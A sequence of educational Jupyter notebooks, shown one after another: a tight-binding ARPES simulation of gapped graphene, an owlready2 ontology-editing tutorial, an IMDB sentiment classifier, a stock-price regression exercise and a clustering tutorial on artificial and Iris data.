We see nicely that the eigenvector has been changed from before--while still resembling the symmetric and antisymmetric combinations we had above, now the charge distribution lies predominantly on one or the other site. Try changing the momentum point where you evaluate this, or increasing/decreasing the size of the mass term to observe its effect. I can compute the photoemission again, resulting in a gapped spectrum
###Code
experiment_semenoff = arpes_lib.experiment(TB_semenoff,arpes_args)
experiment_semenoff.datacube()
_ = experiment_semenoff.spectral(slice_select=('x',Kpt[0]))
_ = experiment_semenoff.spectral(slice_select=('w',-0.0))
###Output
_____no_output_____
###Markdown
In addition to the gap, we also see the modification of the eigenstate manifest in the redistribution of spectral weight on the Fermi surface, which no longer features the complete extinction of intensity on the inside the cone. While the Semenoff mass does not break time-reversal symmetry, Duncan Haldane proposed a different form of perturbation which would have this effect. The Haldane model introduces a complex second-nearest neighbour hopping which has opposite sign on the two sublattice sites. I'll define again a function to introduce this perturbation:
###Code
def haldane_mass(TB,mass):
    # Complex second-nearest-neighbour hoppings, with opposite sign on the two
    # sublattices; entries again follow the [index1, index2, x, y, z, value] convention
    Hnew = []
    vectors = [TB.avec[0],TB.avec[1],TB.avec[1]-TB.avec[0]]
    for ii in range(2):
        for jj in range(3):
            Hnew.append([ii,ii,*vectors[jj],-(2*ii-1)*0.5j*mass])
            # the reverse hop carries the complex-conjugate amplitude (Hermiticity)
            Hnew.append([ii,ii,*(-vectors[jj]),(2*ii-1)*0.5j*mass])
    TB.append_H(Hnew)
###Output
_____no_output_____
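###Markdown
As a hedged sketch of the 'arbitrary phase' generalization suggested below, one possibility is the following. The helper name `haldane_mass_phase` and the sign conventions are my own assumptions (not part of chinook); a particular choice of phi should recover the fixed-phase version above:
###Code
import numpy as np

def haldane_mass_phase(TB, mass, phi):
    # Same structure as haldane_mass, but the complex second-neighbour hopping
    # now carries a tunable phase phi, with opposite sign on the two sublattices
    Hnew = []
    vectors = [TB.avec[0], TB.avec[1], TB.avec[1] - TB.avec[0]]
    for ii in range(2):
        for jj in range(3):
            hop = 0.5 * mass * np.exp(1j * (2 * ii - 1) * phi)
            Hnew.append([ii, ii, *vectors[jj], hop])
            # reverse hop is the complex conjugate, keeping H Hermitian
            Hnew.append([ii, ii, *(-vectors[jj]), np.conj(hop)])
    TB.append_H(Hnew)
###Output
_____no_output_____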
###Markdown
This function generates the simplest form of Haldane mass, with fixed phase. You can try modifying it to allow for arbitrary phase, along the lines of the sketch above. I'm going to define a separate tight-binding model for this perturbation, identical to the unperturbed p$_z$-only basis I used above. I'll then add a Haldane mass term which will result in roughly the same energy splitting as for the Semenoff mass.
###Code
TB_haldane = build_lib.gen_TB(basis,hamiltonian_args,kpath)
haldane_mass(TB_haldane,0.3)
TB_haldane.solve_H()
TB_haldane.plotting()
###Output
_____no_output_____
###Markdown
Evidently, we have effectively the same dispersion as before--breaking time-reversal symmetry now has the effect of gapping out the Dirac cone just as inversion symmetry breaking did. Finally, I can of course also choose to add both a Haldane and a Semenoff mass. For a critically large Haldane mass, I enter a topologically non-trivial phase. In this case, it is useful to consider both inequivalent Dirac points in the unit cell. So I use a modified k-path here:
###Code
momentum_args= {'type':'F',
'avec':avec,
'grain':500,
'pts':[-1.5*K,-K,G,K,1.5*K],
'labels':["1.5K'","K'",'$\\Gamma$','K','1.5K']}
kpath_halsem = build_lib.gen_K(momentum_args)
TB_halsem = build_lib.gen_TB(basis,hamiltonian_args,kpath_halsem)
haldane_mass(TB_halsem,0.25/np.sqrt(3))
semenoff_mass(TB_halsem,0.25)
TB_halsem.solve_H()
TB_halsem.plotting(-1,0.5)
###Output
_____no_output_____
###Markdown
There we go, I've now broken both time-reversal and inversion symmetry, modifying the dispersion in a non-trivial way. While the $K$ and $K'$ points will be energetically inequivalent for arbitrary choices of $m_S$ and $m_H$, at $m_H$=$m_S/\sqrt{3}$ (as written in our formalism), the gap at $K$ closes. This can be contrasted with the Semenoff-only and Haldane-only cases along this same path through both inequivalent k-points of the Brillouin zone.
###Code
TB_semenoff.Kobj = kpath_halsem
TB_haldane.Kobj = kpath_halsem
TB_semenoff.solve_H()
TB_haldane.solve_H()
TB_semenoff.plotting(-1,0.5)
TB_haldane.plotting(-1,0.5)
###Output
_____no_output_____
###Markdown
It is clear from this that the presence of either time-reversal or inversion symmetry preserves the energy-equivalence of the dispersion at $K$ and $K'$, and only by breaking both symmetries can we change this. Finally, we can compute the ARPES intensity for the system with critical Haldane and Semenoff masses at the $K$ and $K'$ points.
###Code
arpes_args['cube']['X'] =[-Kpt[0]-klimits,-Kpt[0]+klimits,500]
arpes_args['cube']['Y'] =[0,0,1]
arpes_args['cube']['E'] = [-1.5,0.25,1000]
experiment_halsem = arpes_lib.experiment(TB_halsem,arpes_args)
experiment_halsem.datacube()
_ = experiment_halsem.spectral(slice_select=('y',0),plot_bands=True)
arpes_args['cube']['X'] =[Kpt[0]-klimits,Kpt[0]+klimits,500]
experiment_halsem = arpes_lib.experiment(TB_halsem,arpes_args)
experiment_halsem.datacube()
_ = experiment_halsem.spectral(slice_select=('y',0),plot_bands=True)
###Output
Initiate diagonalization:
Diagonalization Complete.
Begin computing matrix elements:
||||||||||||||||||||||||||||||100%
Done matrix elements
cwpk-20-basic-management-1.ipynb
###Markdown
# CWPK 20: Basic Knowledge Graph Management - I

*It's Time to Learn How to Do Some Productive Work*

Our previous installments of the Cooking with Python and KBpedia series relied on the full knowledge graph, kbpedia_reference_concepts.owl. That approach was useful to test out whether our current Python and Jupyter Notebook configurations were adequate to handle the entire 58,000 reference concepts (RCs) in KBpedia. However, a file that large makes finding and navigating stuff a bit harder. For this installment, and a few that come thereafter, we will restrict our example to the much smaller upper ontology to KBpedia, KKO (KBpedia Knowledge Ontology). This ontology only has hundreds of concepts, but has the full suite of functionality and component types found in the full system.

In today's installment we will apply some of the basic commands in owlready2 that we learned in the last installment. Owlready2 is the API to our OWL2 knowledge graphs. We will explore the standard CRUD (create-read-update-delete) actions against the classes (reference concepts) in our graph. Since our efforts to date have focused on the R in CRUD (for reading), our emphasis today will be on class creation, updates and deletions.

Remember, you may find the KKO reference file that we use for this installment, kko.owl, where you first stored your KBpedia reference files. (This is what I call main in the code snippet below.)

## Load KKO

Which environment? The specific load routine you should choose below depends on whether you are using the online MyBinder service (the 'raw' version) or local files. See CWPK 17 for further details.

### Local File Option

Like in the last installment, we will follow good practice and use an absolute file or Web address to identify our existing ontology, KKO in this case. Unlike the last installment, we will comment out the little snippet of code we added to provide screen feedback that the file is properly referenced. (If you have any doubts, remove the comment character (#) to restore the feedback):
###Code
main = 'C:/1-PythonProjects/kbpedia/sandbox/kko.owl'
# with open(main) as fobj: # we are not commenting out the code to scroll through the file
# for line in fobj:
# print (line)
###Output
_____no_output_____
###Markdown
Again, you shift+enter or pick Run from the main menu to execute the cell contents. (If you chose to post the code lines to screen, you may clear the file listing from the screen by choosing Cell → All Output → Clear.)We will next consolidate multiple steps from the prior installment to make absolute file references for the imported SKOS ontology and then to actually load the files:
###Code
skos_file = 'http://www.w3.org/2004/02/skos/core'
from owlready2 import *
kko = get_ontology(main).load()
skos = get_ontology(skos_file).load()
kko.imported_ontologies.append(skos)
###Output
_____no_output_____
###Markdown
### MyBinder Option

If you are running this notebook online, do **NOT** run the above routines, since we will use the GitHub files, but now consolidate all steps into a single cell:
###Code
kko_file = 'https://raw.githubusercontent.com/Cognonto/CWPK/master/sandbox/builds/ontologies/kko.owl'
skos_file = 'http://www.w3.org/2004/02/skos/core'
from owlready2 import *
kko = get_ontology(kko_file).load()
skos = get_ontology(skos_file).load()
kko.imported_ontologies.append(skos)
###Output
_____no_output_____
###Markdown
### Check Load Results

OK, no matter which load option you used, we can again test to see if the ontologies registered in the system, only now specifying two base IRIs in a single command:
###Code
print(kko.base_iri,skos.base_iri)
###Output
http://kbpedia.org/ontologies/kko# http://www.w3.org/2004/02/skos/core#
###Markdown
We can also confirm that the additional ontology has been properly imported:
###Code
print(kko.imported_ontologies)
###Output
[get_ontology("http://www.w3.org/2004/02/skos/core#")]
###Markdown
### Re-starting the Notebook

I have alluded to it before, but let's now be explicit about how to stop-and-start a notebook, perhaps just to see whether we can clear memory and test whether all steps up to this point are working properly. To do so, go to File → Save and Checkpoint, and then File → Close and Halt. (You can insert a Rename step in there should you wish to look at multiple versions of what you are working on.)

Upon closing, you will be returned to the main Jupyter Notebook directory screen, where you can navigate to the active file, click on it, and then after it loads, Run the cells up to this point to reclaim your prior working state.

### Inspecting KKO Contents

So, we threw some steps in the process above to confirm that we were finding our files and loading them. We can now check to see if the classes have loaded properly since remaining steps focus on managing them:
###Code
list(kko.classes())
###Output
_____no_output_____
###Markdown
Further, we know that KKO has a class called Products. We also want to see if our file load has properly captured its subClassOf relationships. (In its baseline configuration KKO Products has three sub-classes: Primary ..., Secondary ..., and Tertiary ....) We will return to this cell below multiple times to confirm some of the later steps:
###Code
list(kko.Products.subclasses())
###Output
_____no_output_____
###Markdown
### Create a New Class

'Create' is the first part of the CRUD acronym. There are many ways to create new objects in Python and Owlready2. This section details three different examples. As you interact with these three examples, you may want to go back up to the cell above and test the list(kko.Products.subclasses()) code against each method (we also re-run it below). The first example defines a class WooProducts that is first assigned as a subclass of Thing (the root of OWL), and then re-assigned as a subclass of the Products class. Note that in the second cell of this method we assign a value of 'pass' to it, which is a Python convention for enabling an assignment without actual values as a placeholder for later use. You may see the 'pass' term frequently used as scripts set up their objects in the beginning of programs.
###Code
class WooProducts(Thing):
namespace = kko
class WooProducts(kko.Products):
pass
###Output
_____no_output_____
###Markdown
In the second method, we bypass the initial Thing assignment and directly assign the new class WooFoo:
###Code
class WooFoo(kko.Products):
namespace = kko
###Output
_____no_output_____
###Markdown
In the third of our examples, we instead use the native Python 'types' module to do the assignment directly. This can be a useful approach when we want to process longer lists of assignments:
###Code
import types
with kko:
ProductsFoo = types.new_class("ProductsFoo", (kko.Products,))
###Output
_____no_output_____
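###Markdown
Rather than scrolling back up, we can re-run the subclass listing in place to confirm that all three new classes registered under Products:
###Code
list(kko.Products.subclasses())
###Output
_____no_output_____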
###Markdown
### Update a Class

Unfortunately, there is no direct 'edit' or 'update' function in Owlready2. At the class level one can 'delete' (or 'destroy') a class (see below) and then create a new one; granted, that is a two-step process. For properties, including class relationships such as subClassOf, there are built-in methods to '.append' or '.remove' the assignment without fully deleting the class or individual object. In this case, we remove WooProducts as a subClassOf Products:
###Code
WooProducts.is_a.remove(kko.Products)
###Output
_____no_output_____
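###Markdown
The complementary update works the same way, since is_a is a standard Python list in Owlready2. For illustration, a short sketch that restores the relationship we just removed:
###Code
# re-assert WooProducts as a subclass of Products
WooProducts.is_a.append(kko.Products)
###Output
_____no_output_____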
###Markdown
Since updates tend to occur more for object properties and values, we discuss these options further two installments from now.

### Delete a Class

Deletion occurs through a 'destroy' function that completely removes the object and all of its references from the ontology.
###Code
destroy_entity(WooProducts)
###Output
_____no_output_____
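###Markdown
We can verify the removal: after destroy_entity, the ontology should no longer resolve the class name, so the lookup below should return None:
###Code
print(kko.WooProducts)
###Output
_____no_output_____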
###Markdown
Of course, other functions are available for the use of classes and individuals. See the **Additional Documentation** below for links explaining these options.

### Save the Changes

When all of your desired changes are made programmatically or via an interactive session such as this one, you are then ready to save the knowledge graph out for re-use. It is generally best to write out the modified ontology under a new file name to prevent overwriting your prior version. If, after inspection, you like your changes and see no problems, you can then re-name this file back to the original name and now make it your working version going forward (of course, use the file location of your own choice).
###Code
kko.save(file = "C:/1-PythonProjects/kbpedia/sandbox/kko-test.owl", format = "rdfxml")
###Output
_____no_output_____ |
dense_sentiment_classifier.ipynb | ###Markdown
Dense Sentiment Classifier: classifying IMDB reviews by sentiment. Load dependencies
###Code
import keras
from keras.datasets import imdb
from keras.preprocessing.sequence import pad_sequences
from keras.models import Sequential
from keras.layers import Dense, Flatten, Dropout
from keras.layers import Embedding
from keras.callbacks import ModelCheckpoint
import os
from sklearn.metrics import roc_auc_score
import pandas as pd
import matplotlib.pyplot as plt
%matplotlib inline
###Output
_____no_output_____
###Markdown
Set Hyperparameters
###Code
output_dir = './model_output/dense'
epochs = 4
batch_size = 128
n_dim = 64
n_unique_words = 5000
n_words_to_skip = 50
max_review_length = 100
pad_type = trunc_type = 'pre'
n_dense = 64
dropout = 0.5
###Output
_____no_output_____
###Markdown
Load data
###Code
(x_train, y_train), (x_valid, y_valid) = imdb.load_data(num_words=n_unique_words, skip_top=n_words_to_skip)
x_train[0]
x_train[0:6]
for x in x_train[0:6]:
print(len(x))
y_train[0:6]
len(x_train), len(x_valid)
###Output
_____no_output_____
###Markdown
Restore words from index
###Code
word_index = keras.datasets.imdb.get_word_index()
word_index = {k:(v+3) for k,v in word_index.items()}
word_index["PAD"] = 0
word_index["START"] = 1
word_index["UNK"] = 2
word_index
index_word = {v:k for k,v in word_index.items()}
x_train[0]
' '.join(index_word[id] for id in x_train[0])
###Output
_____no_output_____
###Markdown
If we want to see all words
###Code
(all_x_train, _), (all_x_valid, _) = imdb.load_data()
' '.join(index_word[id] for id in all_x_train[0])
###Output
_____no_output_____
###Markdown
Preprocess data
###Code
x_train = pad_sequences(x_train, maxlen=max_review_length, padding=pad_type, truncating=trunc_type, value=0)
x_valid = pad_sequences(x_valid, maxlen=max_review_length, padding=pad_type, truncating=trunc_type, value=0)
x_train[0:6]
for x in x_train[0:6]:
print(len(x))
' '.join(index_word[id] for id in x_train[5])
###Output
_____no_output_____
###Markdown
Design NN Architecture
###Code
model = Sequential()
model.add(Embedding(n_unique_words, n_dim, input_length=max_review_length))
model.add(Flatten())
model.add(Dense(n_dense, activation='relu'))
model.add(Dropout(dropout))
model.add(Dense(1, activation='sigmoid'))
model.summary()
n_dim, n_unique_words, n_dim*n_unique_words
max_review_length, n_dim, n_dim*max_review_length
n_dense, n_dim*max_review_length*n_dense + n_dense
###Output
_____no_output_____
###Markdown
Configure model
###Code
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
modelcheckpoint = ModelCheckpoint(filepath=output_dir+"/weights.{epoch:02d}.hdf5")
if not os.path.exists(output_dir):
os.makedirs(output_dir)
###Output
_____no_output_____
###Markdown
Train!
###Code
model.fit(x_train, y_train, batch_size=batch_size, epochs=epochs, verbose=1, validation_data=(x_valid, y_valid), callbacks=[modelcheckpoint])
###Output
Train on 25000 samples, validate on 25000 samples
Epoch 1/4
25000/25000 [==============================] - 9s 363us/step - loss: 0.5504 - acc: 0.6973 - val_loss: 0.3598 - val_acc: 0.8414
Epoch 2/4
25000/25000 [==============================] - 2s 97us/step - loss: 0.2790 - acc: 0.8877 - val_loss: 0.3489 - val_acc: 0.8445
Epoch 3/4
25000/25000 [==============================] - 2s 95us/step - loss: 0.1151 - acc: 0.9649 - val_loss: 0.4240 - val_acc: 0.8327
Epoch 4/4
25000/25000 [==============================] - 2s 97us/step - loss: 0.0239 - acc: 0.9964 - val_loss: 0.5248 - val_acc: 0.8334
###Markdown
Evaluate
###Code
model.load_weights(output_dir+'/weights.01.hdf5')
y_hat = model.predict_proba(x_valid)
y_hat[0]
plt.hist(y_hat)
_ = plt.axvline(x=0.5, color='orange')
pct_auc = roc_auc_score(y_valid, y_hat)*100.0
"{:0.2f}".format(pct_auc)
float_y_hat = []
for y in y_hat:
float_y_hat.append(y[0])
ydf = pd.DataFrame(list(zip(float_y_hat,y_valid)), columns=['y_hat', 'y'])
ydf.head(10)
' '.join(index_word[id] for id in all_x_valid[0])
' '.join(index_word[id] for id in all_x_valid[7])
###Output
_____no_output_____
###Markdown
Instances where neural net was wrong (review was negative but prediction was positive)
###Code
ydf[(ydf.y == 0) & (ydf.y_hat > 0.9)].head(10)
' '.join(index_word[id] for id in all_x_valid[2397])
###Output
_____no_output_____
###Markdown
Instances where neural net was wrong (review was positive but prediction was negative)
###Code
ydf[(ydf.y == 1) & (ydf.y_hat < 0.1)].head(10)
' '.join(index_word[id] for id in all_x_valid[2027])
###Output
_____no_output_____ |
Stock_Prediction_Using_Linear_Regression_and_DecisionTree_Regression_Model.ipynb | ###Markdown
Decision Tree is used in practical approaches to supervised learning. It can be used to solve both Regression and Classification tasks. It is a tree-structured classifier with three types of nodes. A decision tree builds regression or classification models in the form of a tree structure: it breaks down a dataset into smaller and smaller subsets while, at the same time, an associated decision tree is incrementally developed. Decision trees can handle both categorical and numerical data.
###Code
#Install the dependencies
import numpy as num
import pandas as pan
from sklearn.tree import DecisionTreeRegressor #Decision Trees in Machine Learning to Predict Stock Movements.A decision tree algorithm performs a set of recursive actions before it arrives at the end result and when you plot these actions on a screen, the visual looks like a big tree, hence the name 'Decision Tree'.
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as mat
mat.style.use('bmh')  # matplotlib.pyplot was imported as 'mat' above
#Load the data
from google.colab import files
uploaded = files.upload()
###Output
_____no_output_____
###Markdown
The dataset comprises Open, High, Low, and Close prices and Volume indicators (OHLCV).
###Code
#Store the data into a data frame
dataframe = pan.read_csv('NSE-TATAGLOBAL.csv')
dataframe.head(5)
#Get the number of trading days
dataframe.shape
#Visualize the close price data
mat.figure(figsize=(16,8))
mat.title('TATAGLOBAL')
mat.xlabel('Days')
mat.ylabel('Close Price USD ($)')
mat.plot(dataframe['Close'])
mat.show()
#Get the close Price
dataframe = dataframe[['Close']]
dataframe.head(4)
#Create a variable to predict 'x' days out into the future
future_days = 25
#Create a new column (target) shifted 'x' units/days up
dataframe['Prediction'] = dataframe[['Close']].shift(-future_days)
dataframe.tail(4)
#Create the feature data set (X) and convert it to a numpy array and remove the last 'x' rows/days
X = num.array(dataframe.drop(['Prediction'],1))[:-future_days]
print(X)
#Create the target data set (y) and convert it to a numpy array and get all of the target values except the last 'x' rows/days
y = num.array(dataframe['Prediction'])[:-future_days]
print(y)
#Split the data into 75% training and 25% testing
x_train,x_test,y_train,y_test = train_test_split(X , y ,test_size = 0.25)
#Create the models
#Create the decision tree regressor model
tree = DecisionTreeRegressor().fit(x_train , y_train)
#Create the linear regression model
lr = LinearRegression().fit(x_train , y_train)
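# Optional sanity check (a sketch, not in the original): R^2 of each model on
# the held-out 25% test split before forecasting the future window.
print('Decision tree R^2:', tree.score(x_test, y_test))
print('Linear regression R^2:', lr.score(x_test, y_test))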
#Get the last 'x' rows of the feature data set
x_future = dataframe.drop(['Prediction'], 1)[:-future_days]
x_future = x_future.tail(future_days)
x_future = num.array(x_future)
x_future
#Show the model tree prediction
tree_prediction = tree.predict(x_future)
print(tree_prediction)
print()
#Show the model linear regression prediction
lr_prediction = lr.predict(x_future)
print(lr_prediction)
###Output
[116.45 116.7 111.5 113.05 123.9
99.675 128.725 122.55 111. 114.975
127.125 130.4 141.05 114.45 119.41666667
114.45 117.3 114.975 116.6 118.25
118.65 117.6 112.61666667 121.25 118.6 ]
[121.78884899 123.04822121 123.74787244 125.14717491 123.70122903
121.13584117 122.7217173 124.63409734 122.86164755 122.39521339
123.42136853 124.02773294 125.94011298 127.66591936 127.15284179
127.57263253 123.3280817 122.39521339 122.62843047 123.18815146
120.85598067 118.15066257 118.29059282 118.66374014 117.59094158]
###Markdown
Let's Visualize the data
###Code
predictions = tree_prediction #The regression decision trees take ordered values with continuous values.
valid = dataframe[X.shape[0]:]
valid['Predictions'] = predictions
mat.figure(figsize=(16,8))
mat.title('Stock Market Prediction Decision Tree Regression Model using sklearn')
mat.xlabel('Days')
mat.ylabel('Close Price USD ($)')
mat.plot(dataframe['Close'])
mat.plot(valid[['Close','Predictions']])
mat.legend(['Orig','Val','Pred'])
mat.show()
predictions = lr_prediction #Linear Model for Stock Price Prediction
valid = dataframe[X.shape[0]:]
valid['Predictions'] = predictions
mat.figure(figsize=(16,8))
mat.title('Stock Market Prediction Linear Regression Model')
mat.xlabel('Days')
mat.ylabel('Close Price USD ($)')
mat.plot(dataframe['Close'])
mat.plot(valid[['Close','Predictions']])
mat.legend(['Orig','Val','Pred'])
mat.show()
###Output
/usr/local/lib/python3.7/dist-packages/ipykernel_launcher.py:4: SettingWithCopyWarning:
A value is trying to be set on a copy of a slice from a DataFrame.
Try using .loc[row_indexer,col_indexer] = value instead
See the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy
after removing the cwd from sys.path.
|
seminars/04/04_clustering_en.ipynb | ###Markdown
Clustering: Within this notebook we will play with clustering. * First we try hierarchical clustering and k-means on artificial data to see visually how those two methods work. * Then, on the Iris dataset, we use hierarchical clustering to observe its structure. * Finally, we focus on vector quantization as a nice application of the k-means algorithm to compress images.
###Code
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
%matplotlib inline
np.set_printoptions(precision=5, suppress=True) # suppress scientific float notation (so 0.000 is printed as 0.)
###Output
_____no_output_____
###Markdown
Artificial data - hierarchical clustering & k-means. Artificial data generation: We generate random samples from three different multivariate normal distributions and merge them. The parameters of a multivariate normal distribution are:* The mean - corresponding to the center of the cluster.* The covariance matrix - corresponding to the shape (circle or ellipse with some direction) and size of the cluster.
###Code
# generate three clusters: a with 60 points, b with 40, c with 20:
np.random.seed(50) # for repeatability of this tutorial
a = np.random.multivariate_normal([7, 7], [[2, 0.5], [0.5, 2]], size=[60,])
b = np.random.multivariate_normal([0, 15], [[2, 0], [0, 2]], size=[40,])
c = np.random.multivariate_normal([15, 0], [[3, 1], [1, 4]], size=[20,])
# merge the clusters into X
X = np.concatenate((a, b, c),)
# print the shape
print(X.shape)
# visualize the data
plt.scatter(X[:,0], X[:,1])
plt.axis('equal')
plt.show()
###Output
_____no_output_____
###Markdown
Hierarchical agglomerative clustering: We use the `scipy` library and especially its hierarchical clustering functions. [(docs here)](https://docs.scipy.org/doc/scipy/reference/cluster.hierarchy.html). This part is inspired by [this blog post](https://joernhees.de/blog/2015/08/26/scipy-hierarchical-clustering-and-dendrogram-tutorial/). First we create the dendrogram. We use the `linkage` function for that. [(docs here)](https://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.linkage.html#scipy.cluster.hierarchy.linkage).* One of its important arguments is the method by which the cluster distance is measured.* First we use single linkage, but later you can play with other ones - complete linkage / average linkage / Ward's method.
###Code
from scipy.cluster.hierarchy import dendrogram, linkage
# generate the linkage matrix
Z = linkage(X, 'single')
# see the shape of the output
print(Z.shape)
###Output
_____no_output_____
###Markdown
The result is a linkage matrix where each row corresponds to a merging of two clusters. In columns we have:* the index of a first merged cluster* the index of the second merged cluster* the distance between merged clusters* the number of original observations in the newly formed cluster
###Code
# Observe first 5 rows of Z
print(Z[:5,:])
# especially focus on the 3rd row where the second cluster with index 120 is actually the first one created by merging.
###Output
_____no_output_____
###Markdown
Now let us visualize the dendrogram. For this we can use the `dendrogram` function. [(docs here)](https://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.dendrogram.html#scipy.cluster.hierarchy.dendrogram)
###Code
# calculate full dendrogram
plt.figure(figsize=(25, 10))
plt.title('Hierarchical Clustering Dendrogram')
plt.xlabel('sample index')
plt.ylabel('distance')
dendrogram(
Z,
leaf_rotation=90., # rotates the x axis labels
leaf_font_size=8., # font size for the x axis labels
)
plt.show()
###Output
_____no_output_____
###Markdown
We can see that:* horizontal lines are cluster merges* vertical lines tell us which clusters/labels were part of the merge forming that new cluster* heights of the horizontal lines correspond to distances between merged clusters
###Code
# We can also plot just the upper part of the dendrogram
plt.title('Hierarchical Clustering Dendrogram (truncated)')
plt.xlabel('sample index or (cluster size)')
plt.ylabel('distance')
dendrogram(
Z,
truncate_mode='lastp', # show only the last p merged clusters
p=10, # show only the last p merged clusters
leaf_rotation=90.,
leaf_font_size=12.,
show_contracted=True, # to get a distribution impression in truncated branches
)
plt.show()
###Output
_____no_output_____
###Markdown
A fancier version of the dendrogram plot, with [the distances annotated inside the dendrogram](https://stackoverflow.com/questions/11917779/how-to-plot-and-annotate-hierarchical-clustering-dendrograms-in-scipy-matplotlib/12311618#12311618)
###Code
def fancy_dendrogram(*args, **kwargs):
max_d = kwargs.pop('max_d', None)
if max_d and 'color_threshold' not in kwargs:
kwargs['color_threshold'] = max_d
annotate_above = kwargs.pop('annotate_above', 0)
ddata = dendrogram(*args, **kwargs)
if not kwargs.get('no_plot', False):
plt.title('Hierarchical Clustering Dendrogram (truncated)')
plt.xlabel('sample index or (cluster size)')
plt.ylabel('distance')
for i, d, c in zip(ddata['icoord'], ddata['dcoord'], ddata['color_list']):
x = 0.5 * sum(i[1:3])
y = d[1]
if y > annotate_above:
plt.plot(x, y, 'o', c=c)
plt.annotate("%.3g" % y, (x, y), xytext=(0, -5),
textcoords='offset points',
va='top', ha='center')
if max_d:
plt.axhline(y=max_d, c='k')
return ddata
fancy_dendrogram(
Z,
truncate_mode='lastp',
p=12,
leaf_rotation=90.,
leaf_font_size=12.,
show_contracted=True,
annotate_above=1.9, # useful in small plots so annotations don't overlap
)
plt.show()
###Output
_____no_output_____
###Markdown
Retrieving clusters from the dendrogram: For this we have the `fcluster` function. [(docs here)](https://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.fcluster.html#scipy.cluster.hierarchy.fcluster) If we know the cut height, i.e. the threshold for the cluster distance
###Code
from scipy.cluster.hierarchy import fcluster
max_d = 5
clusters = fcluster(Z, max_d, criterion='distance')
# show clusters
print(clusters)
# figure
plt.scatter(X[:,0], X[:,1], c=clusters, cmap='brg') # plot points with cluster dependent colors
plt.show()
# show the cut in the truncated dendrogram
fancy_dendrogram(
Z,
truncate_mode='lastp',
p=12,
leaf_rotation=90.,
leaf_font_size=12.,
show_contracted=True,
annotate_above=1.9, # useful in small plots so annotations don't overlap
max_d = max_d,
)
plt.show()
###Output
_____no_output_____
###Markdown
If we know the number of clusters $k$
###Code
k = 3
clusters = fcluster(Z, k, criterion='maxclust')
# show clusters
print(clusters)
# figure
plt.scatter(X[:,0], X[:,1], c=clusters, cmap='brg') # plot points with cluster dependent colors
plt.show()
###Output
_____no_output_____
###Markdown
K-means algorithm: We use the `clustering` part of the `sklearn` library. [(docs here)](http://scikit-learn.org/stable/modules/clustering.html#k-means) There is a class `KMeans` which can be used for that. [(docs here)](http://scikit-learn.org/stable/modules/generated/sklearn.cluster.KMeans.html#sklearn.cluster.KMeans)
###Code
from sklearn.cluster import KMeans
# first lets try 2 clusters
k = 2
kmeans = KMeans(n_clusters = k, random_state = 1).fit(X)
# to show resulting clusters
print(kmeans.labels_)
# to see cluster centers
print(kmeans.cluster_centers_)
# figure
plt.scatter(X[:,0], X[:,1], c=kmeans.labels_, cmap='brg', alpha=0.4) # plot points with cluster dependent colors
plt.scatter(kmeans.cluster_centers_[:,0], kmeans.cluster_centers_[:,1], c = 'black', s=100)
plt.show()
# the same for 3 clusters
k = 3
kmeans = KMeans(n_clusters = k, random_state = 1).fit(X)
# figure
plt.scatter(X[:,0], X[:,1], c=kmeans.labels_, cmap='brg', alpha=0.4) # plot points with cluster dependent colors
plt.scatter(kmeans.cluster_centers_[:,0], kmeans.cluster_centers_[:,1], c = 'black', s=100)
plt.show()
###Output
_____no_output_____
###Markdown
In the default setting the algorithm initializes in some smart way, `init = 'k-means++'` [Arthur, Vassilvitskii (2007)](http://ilpubs.stanford.edu:8090/778/1/2006-13.pdf), and the whole run is repeated 10 times, `n_init = 10`. It is also possible to initialize it manually or with a random selection from the data.
###Code
k = 3
# manual initialization
initial_centers = np.array([[0,10],[10,10],[10,0]])
# clusterring
kmeans = KMeans(n_clusters = k, random_state = 1, init = initial_centers, n_init = 1).fit(X)
# figure
plt.scatter(X[:,0], X[:,1], c=kmeans.labels_, cmap='brg', alpha=0.4) # plot points with cluster dependent colors
plt.scatter(initial_centers[:,0], initial_centers[:,1], c = 'black', s=50, alpha = 0.9, marker = 'x') # initial centers
plt.scatter(kmeans.cluster_centers_[:,0], kmeans.cluster_centers_[:,1], c = 'black', s=100) # final centers
plt.legend(['Data', 'Initial Centers', 'Final Centroids'])
plt.show()
###Output
_____no_output_____
###Markdown
The $k$-means algorithm may also be performed manually
###Code
from sklearn.metrics import pairwise_distances_argmin
centers = initial_centers
for i in range(3):
y_pred = pairwise_distances_argmin(X, centers)
new_centers = np.array([X[y_pred == i].mean(0) for i in range(len(centers))])
# figure
plt.scatter(X[:,0], X[:,1], c=y_pred, cmap='brg', alpha=0.4) # plot points with cluster dependent colors
plt.scatter(centers[:,0], centers[:,1], c = 'black', s=50, alpha = 0.9, marker = 'x') # old centers
plt.scatter(new_centers[:,0], new_centers[:,1], c = 'black', s=100) # new centers
plt.title('Manual $k$-means, step ' + str(i+1))
plt.legend(['Data', 'Old Centers', 'New Centers'])
plt.show()
centers = new_centers
###Output
_____no_output_____
###Markdown
Elbow method for $k$ estimation
###Code
ix = np.zeros(5)
iy = np.zeros(5)
for k in range(ix.shape[0]):
kmeans = KMeans(n_clusters=k+1, random_state = 1)
kmeans.fit(X)
iy[k] = kmeans.inertia_
ix[k] = k+1
plt.xlabel('$k$')
plt.ylabel('Objective function')
plt.plot(ix, iy, 'o-')
plt.show()
###Output
_____no_output_____
###Markdown
Task 1 - perform hierarchical clustering on the Iris dataset* Search for 3 clusters* Discuss and measure the quality of the final clusters. The real types of irises (Setosa, Versicolour, and Virginica) are stored in the y variable.* Try to find a cluster distance function such that the final clusters correspond to the real types as accurately as possible.
###Code
from sklearn import datasets
iris = datasets.load_iris()
X = iris.data
y = iris.target
print('X shape:', X.shape)
## your code here
Z = linkage(X, 'single') # best is ward - at least between the triple - single, complete and ward
k = 3
clusters = fcluster(Z, k, criterion='maxclust')
# recode values so they match - this have to be done manually
print('Assigned clusters:', clusters)
print('True types:', y)
# - ward method & single linkage
clusters[clusters == 1] = 0
clusters[clusters == 3] = 1
# - complete linkage
# clusters[clusters == 3] = 0
# clusters[clusters == 2] = 3
# clusters[clusters == 1] = 2
# clusters[clusters == 3] = 1
# show accuracy
